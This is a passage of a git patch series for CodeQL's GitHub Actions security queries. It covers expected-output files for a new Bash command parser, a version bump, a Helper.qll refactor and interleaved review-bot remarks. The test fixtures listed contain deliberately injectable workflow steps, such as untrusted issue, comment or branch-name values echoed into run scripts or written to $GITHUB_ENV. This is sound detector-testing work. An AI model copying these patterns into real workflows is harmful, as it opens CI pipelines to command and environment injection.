| | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | 
@@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f20fdc79829..85b93765324 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -31,7 +31,7 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | -| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | From 531f3d40c010be1d03f114f82ac7643350d311ac Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:35:09 +0200 Subject: [PATCH 0562/1267] Add tests for new bash parser --- .../.github/workflows/commands.yml | 21 ++ ql/test/library-tests/commands.expected | 206 ++++++++++++++++++ ql/test/library-tests/commands.ql | 4 + .../library-tests/poisonable_steps.expected | 2 - 4 files changed, 231 insertions(+), 2 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/commands.yml create mode 100644 ql/test/library-tests/commands.expected create mode 100644 ql/test/library-tests/commands.ql diff --git a/ql/test/library-tests/.github/workflows/commands.yml b/ql/test/library-tests/.github/workflows/commands.yml new file mode 100644 index 00000000000..11ef1a60d31 --- /dev/null +++ b/ql/test/library-tests/.github/workflows/commands.yml @@ -0,0 +1,21 @@ +on: push + +jobs: + local_commands: + runs-on: ubuntu-latest + steps: + - run: | + command1 ; command2 + - run: | + command3 | command4 + - run: | + command5 "$(command6)" + - run: | + command7 && command8 + - run: | + command9 || command10 + - run: | + command11 "`command12`" + - run: | + command13 "`command14` $(date | wc -l)" + diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected new file mode 100644 index 00000000000..17b8b982a71 --- /dev/null +++ b/ql/test/library-tests/commands.expected 
@@ -0,0 +1,206 @@ +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command1 | +| .github/workflows/commands.yml:7:9:9:6 | Run Step | command2 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command3 | +| .github/workflows/commands.yml:9:9:11:6 | Run Step | command4 | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command5 "SUBCOMMAND" | +| .github/workflows/commands.yml:11:9:13:6 | Run Step | command6 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command7 | +| .github/workflows/commands.yml:13:9:15:6 | Run Step | command8 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command9 | +| .github/workflows/commands.yml:15:9:17:6 | Run Step | command10 | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command11 "SUBCOMMAND" | +| .github/workflows/commands.yml:17:9:19:6 | Run Step | command12 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command13 "SUBCOMMAND SUBCOMMAND" | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | command14 | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | date | +| .github/workflows/commands.yml:19:9:20:50 | Run Step | wc -l | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | +| 
.github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a 
"$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:30:9:34:6 
| Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| 
.github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | . 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "bar" | +| 
.github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| 
.github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/ql/test/library-tests/commands.ql b/ql/test/library-tests/commands.ql new file mode 100644 index 00000000000..a13608145cf --- /dev/null +++ b/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getACommand() diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 0cd71f96ea9..100eddb1400 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,6 +1,4 @@ -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | From 68da4823529d4084cb953d7a3950f4d05555af14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:36:49 +0200 Subject: [PATCH 0563/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index af477fb9bf7..9637b993118 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
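Review bot: The rows for `.github/workflows/poisonable_steps.yml:36:9:37:6` pin a mis-split as expected output. The `|` delimiters inside the double-quoted `sed -i "s|…|…|"` argument, which also contains escaped quotes, are treated as pipes, so fragments such as `git_branch = .*` and `" config.json` are listed as commands. If the security queries match on what `getACommand()` returns (the later parser patch suggests so), this baseline can hide a real `sed -i` on a checked-out file and report fragments that were never executed. The diffstat of the "Improve Bash script parser" patch lists this file again, so it may already be corrected there. If it is not, I would add a dedicated step to `commands.yml`, for example the constructed case `command15 "a \"b\" | c ; d"`, and expect exactly one row for it.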
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.61 +version: 0.1.62 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b8b9ef321c..6548292a677 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.61 +version: 0.1.62 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7d2cbc1f50bd1121a0a0ec88ec955d8b35a9f708 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:13:27 +0200 Subject: [PATCH 0564/1267] Improve Bash script parser --- ql/lib/codeql/actions/Ast.qll | 18 + ql/lib/codeql/actions/Helper.qll | 508 ++++++++---------- ql/lib/codeql/actions/ast/internal/Ast.qll | 194 ++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 58 +- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 11 +- .../security/OutputClobberingQuery.qll | 34 +- .../actions/security/PoisonableSteps.qll | 9 +- ql/test/library-tests/commands.expected | 32 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.ql | 12 +- 11 files changed, 492 insertions(+), 394 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a4c50ecf55b..759bcf3f786 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -294,9 +294,27 @@ class Run extends Step instanceof RunImpl { string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + string getACommand() { result = super.getACommand() } + predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + + predicate getAWriteToGitHubEnv(string name, string value) { + super.getAWriteToGitHubEnv(name, value) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + super.getAWriteToGitHubOutput(name, value) + } + + predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index d6e3042ead3..8391463fd20 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
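Review bot: The members added to `Run` in this hunk have no QLDoc, and their contracts are not recoverable from the names. Nothing says whether `i` in `getStmt(int i)`, `getCommand(int i)` and `getAssignment(int i, …)` is the same index, or what `name` and `value` hold when the write is a heredoc or a block redirect. `getAWriteToGitHubEnv`, `getAWriteToGitHubOutput` and `getAWriteToGitHubPath` are presumably what the env-var, output-clobbering and path-injection queries touched by this commit rely on, so each deserves a one-line comment. Assuming that is what it models, an example is `/** Holds if this step writes value to the file referenced by GITHUB_PATH. */`. As a style point, these are result-less predicates named `get…`, where the QL convention keeps `get` for predicates with a result; a name like `writesToGitHubPath(value)` would read better, although the existing `getAnAssignment` already sets the precedent, and the class body starts outside the hunk.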
@@ -24,219 +24,6 @@ string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -/** Checks if expr is a bash parameter expansion */ -bindingset[expr] -predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) -} - -bindingset[raw_content] -predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) -} - -bindingset[script] -predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) 
and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) -} - -bindingset[script] -predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) -} - -bindingset[script] -predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) -} - -bindingset[script] -predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - 